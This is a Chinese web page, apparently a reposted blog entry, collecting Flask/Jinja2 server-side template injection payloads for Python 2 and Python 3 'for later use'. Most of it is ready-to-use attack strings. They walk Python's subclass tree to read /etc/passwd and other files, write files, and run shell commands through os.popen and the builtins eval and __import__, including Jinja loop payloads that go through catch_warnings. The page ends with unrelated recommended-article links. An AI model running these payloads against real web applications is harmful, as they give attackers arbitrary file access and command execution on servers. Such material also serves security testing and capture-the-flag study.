2. 程式人生 > 實用技巧 >flask模板注入payload——python2和python3

flask模板注入payload——python2和python3

阿新 發佈:2020-11-22

把模板注入的payload記錄在這裡,方便以後使用。

主要分為兩類python2和python3

還有各種過濾和繞過

python2

檔案操作

找到file類

[].class.bases[0].subclasses()[40]

payload:

#讀檔案
[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
#寫檔案
[].__class__.__bases__[0].__subclasses__()[40]('/tmp').write('test')

命令執行

os執行

[].class.bases[0].subclasses

()[59].init.func_globals.linecache下有os類,可以直接執行命令

payload:

[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()

#eval,impoer等全域性函式

[].class.bases[0].subclasses()[59].init.globals.__builtins__下有eval,__import__等的全域性函式,可以利用此來執行命令

payload:

[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()

python3

檔案操作

payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}

命令執行

payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}

參考:https://xi4or0uji.github.io/2019/01/15/flask之ssti模板注入/

相關推薦

flask模板注入payload——python2python3

模板注入payload記錄在這裡,方便以後使用。 主要分為兩類python2python3 還有各種過濾繞過

win10下python2python3共存問題解決方法

1.依次安裝python2python3,並新增到系統環境變數中 2.找到python3的安裝目錄,一般在C:\\Users\\Administrator\\AppData\\Local\\Programs\\Python路徑,修改python3.6中python.exepythonw.exe的名稱為python3.e

python2python3應該學哪個(python3.6與python3.7的選擇)

首先先說一下python2python3的選擇 許多剛入門 Python 的朋友都在糾結的的問題是:我應該選擇學習 python2 還是 python3

程式碼總結Python2 Python3 字串的區別

Python2 >>> >>> isinstance(b\'abc\',bytes) True >>> >>> isinstance(b\'abc\',str)

Python2Python3中@abstractmethod使用方法

這篇文章主要介紹了Python2Python3中@abstractmethod使用方法,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

新手學習Python2Python3中print不同的用法

Python2Python3中都提供print()方法來列印資訊,但兩個版本間的print稍微有差異

python2python3哪個使用率高

python語言是在20世紀90年代誕生的,算算到現在已經是25歲的大叔級的語言了(跟它同一個時代的還有一個鼎鼎大名的java是在1995發行的, 紅了幾十年).但是Python真正成名比java晚了很多年,其實也主要是應用領域的時代

Win10環境中如何實現python2python3並存

1.下載 Python官網:傳送門 根據自己的主機環境下載python 2.安裝 下載完後直接安裝,安裝時自定義安裝路徑,這裡路徑要記下來

同時安裝python2python3的呼叫方法

windows環境下同時安裝了python2python3,通過命令列視窗執行python指令碼: 1、python呼叫

Python2Python3編碼問題

技術標籤:python字串亂碼 前言 以下內容來自網上&個人總結,如果有什麼地方錯誤或者表達不準確歡迎指正。

Flask模板注入

簡單SSTI Flask模板注入漏洞屬於經典的SSTI(伺服器模板注入漏洞)。 Title: [CVE-2019-8341] Python Jinja2 command injection in function from_string

CTF-flask模板注入學習

今天又看到了一道這樣的題,之前一直都學不明白的東西 反反覆覆給你看的時候,就想搞明白了。

電腦上同時安裝Python2Python3

第一步,安裝兩個版本的python 這一步就不多解釋了,大家可以到www.python.org/下載對應計算機系統的python安裝檔案,直接點選安裝即可。

Python2Python3的區別

這個世界並不是非黑即白的,Python也不是有了前面的資料做支撐,我們不是應該學習Python 2嗎,為什麼Python 2Python 3都要學呢?

jupyter notebook下python2python3共存(kali)

簡介:Jupyter Notebook(此前被稱為 IPython notebook)是一個互動式筆記本,支援執行 40 多種程式語言。Jupyter Notebook 的本質是一個 Web 應用程式,便於建立共享文學化程式文件,支援實時程式碼,數學方程,視

python2python3的(語法)區別

python3python2的(語法)區別: 開始... print: print(\'hello word\')# 3 print \'hello word\'# 2

window7下的python2.7版本python3.5版本的opencv-python安裝過程

花費了整整2天的時間終於學會安裝了opencv,換系統的心都有了,由於ubuntu實在不會玩,看來還是老老實實在windows下安裝吧,以此作為記錄方便以後安裝

使用python2flask開發一個http介面的方法

參考:使用python實現介面的方法 程式碼Demo 1 import flask 2from flask import request 3from flask import jsonify

[Opencv]基於arm64Python2Python3的opencv-python-contrib編譯

前言   最近基於輕舟無人小車上在做車道線檢測紅綠燈小車,但是其板子是ARM 64的,為了能夠在ubuntu18.04下的melodic版本的ROS1中使用opencv-contrib相關的函式,只能自己編譯,當然,編譯的版本是Opencv4.5.0

python學習筆記——flask之渲染模板(Jinja2)-特殊變數方法

Flask中,有一些特殊的變數方法是可以在模板檔案中直接訪問的。 一、config 物件: